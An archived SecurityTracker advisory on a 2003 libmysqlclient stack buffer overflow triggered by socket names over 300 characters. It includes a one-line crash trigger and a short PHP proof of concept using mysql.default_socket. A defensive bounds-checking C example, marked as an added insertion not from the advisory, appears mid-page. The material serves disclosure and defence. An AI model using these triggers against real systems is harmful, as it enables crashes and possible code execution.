SecurityTracker.com Archives

Category:   Application (Database)  >   libmysqlclient
Vendors:   MySQL.com
MySQL Buffer Overflow in 'mysql_real_connect()' Client Function May Let Remote or Local Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006976
SecurityTracker URL:  http://securitytracker.com/id/1006976
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 13 2003
Impact:   Denial of service via network, Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network

Version(s): 4.x and prior versions
Description:   A buffer overflow vulnerability was reported in the MySQL libmysqlclient software. A remote or local user may be able to cause arbitrary code to be executed or cause an application to crash, depending on how the application uses the vulnerable libmysqlclient library.

SCAN Associates reported that the mysql_real_connect() function contains a buffer overflow. A UNIX socket name longer than 300 characters can trigger the overflow and potentially execute arbitrary code.

A demonstration exploit example is provided:

mysql -S `perl -e 'print "A" x 350'` -hlocalhost

The extent to which this flaw can be exploited depends on the application that uses the affected function call. In some applications, a remote or local user may be able to cause the application to execute arbitrary code.
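The advisory does not show the faulty code inside mysql_real_connect(), but the report (a socket name of 350 bytes overflowing a stack buffer) is consistent with an unchecked copy of a caller-supplied path into a fixed-size buffer. The following C program is an added example, not code from the advisory or from MySQL, showing the defensive pattern that closes this class of bug: measure the untrusted string against the real capacity of the destination (here the sun_path member of sockaddr_un) before copying, and reject rather than truncate when it does not fit. The function names and the assumed root cause are this example's own.

```c
/* Added example (not from the advisory or MySQL): bounds-checked
 * handling of a caller-supplied UNIX socket path. The root cause of the
 * reported overflow is assumed here to be an unchecked copy into a
 * fixed-size buffer; the fix pattern is to check length first and to
 * fail closed on oversized input instead of truncating it silently. */
#define _POSIX_C_SOURCE 200809L
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Return codes for safe_unix_socket_addr() and check_socket_path(). */
enum { SOCKPATH_OK = 0, SOCKPATH_EMPTY = -1, SOCKPATH_TOO_LONG = -2 };

/* Fill *addr from path. Fails (leaving *addr zeroed) if path is NULL,
 * empty, or does not fit in sun_path together with its NUL terminator.
 * sizeof sun_path is 108 on Linux and 104 on the BSDs; the code never
 * hard-codes either number, it reads the real capacity. */
int safe_unix_socket_addr(const char *path, struct sockaddr_un *addr)
{
    const size_t cap = sizeof addr->sun_path;
    size_t len;

    memset(addr, 0, sizeof *addr);
    if (path == NULL || path[0] == '\0')
        return SOCKPATH_EMPTY;

    /* strnlen bounds the scan itself, so an unterminated or huge input
     * can report at most "cap" and is rejected by the next check. */
    len = strnlen(path, cap);
    if (len >= cap)
        return SOCKPATH_TOO_LONG;

    addr->sun_family = AF_UNIX;
    memcpy(addr->sun_path, path, len + 1); /* len + 1 copies the NUL too */
    return SOCKPATH_OK;
}

/* Mirrors a client-library entry point: returns the accepted path length
 * on success or a negative SOCKPATH_* code on rejection. */
int check_socket_path(const char *path)
{
    struct sockaddr_un addr;
    int rc = safe_unix_socket_addr(path, &addr);
    return rc == SOCKPATH_OK ? (int)strlen(addr.sun_path) : rc;
}

/* Helper that builds a constructed path of n copies of c (e.g. the
 * advisory's 350 x "A") and runs it through the check. n is capped so
 * the helper itself cannot overflow its own buffer. */
int check_repeated_char_path(char c, size_t n)
{
    char buf[1024];
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memset(buf, c, n);
    buf[n] = '\0';
    return check_socket_path(buf);
}

int main(void)
{
    /* Constructed inputs: a normal socket path and the advisory's
     * 350-byte "A" string, which a correct check must reject. */
    printf("/tmp/mysql.sock -> %d\n", check_socket_path("/tmp/mysql.sock"));
    printf("350 x 'A'       -> %d\n", check_repeated_char_path('A', 350));
    return 0;
}
```

The same check belongs at the point where a library accepts the path from configuration (such as the mysql.default_socket setting used in the PHP proof of concept below), since that is the boundary where untrusted length first enters library code.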

The vendor has reportedly been notified (on June 1, 2003).

Impact:   The impact depends on the application that uses the vulnerable function call. In some implementations, it may be possible for a remote or local user to execute arbitrary code on the target application.
Solution:   No solution was available at the time of this entry. The vendor reportedly plans to issue a fix soon.
Vendor URL:  www.mysql.com/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] libmysqlclient 4.x and below mysql_real_connect() buffer overflow.


SCAN Associates Sdn Bhd Security Advisory

Products: libmysqlclient 4.x and below (http://www.mysql.com)
Date: 12 June 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net 
	shaharil_at_scan-associates.net 
	munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: libmysqlclient 4.x and below mysql_real_connect() buffer overflow.

Description
===========
libmysqlclient is a client library to communicate with the MySQL server.

Details
=======
There is a stack buffer overflow in the mysql_real_connect() function with a
long UNIX socket name (over 300 characters).

ex:
	mysql -S `perl -e 'print "A" x 350'` -hlocalhost

proof of concept
----------------
This bug has been successfully tested on safe_mode PHP in our latest Geeklog bug
http://www.scan-associates.net/papers/geeklog.txt where a user can upload a
*.php file.

<?php
    // Build a 350-byte socket name, longer than the ~300 bytes the client handles
    $buff = "";
    for ($i = 0; $i < 350; $i++)
        $buff .= "A";
    // Point the client library at the oversized socket path; the connect
    // attempt passes it to mysql_real_connect() and triggers the overflow
    ini_set("mysql.default_socket", $buff);
    mysql_connect("localhost", "blabla", "blabla");
?>

Vendor Response 
=============== 
The vendor was contacted on 06/01/2003 and a fix will be available soon.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Copyright 2020, SecurityGlobal.net LLC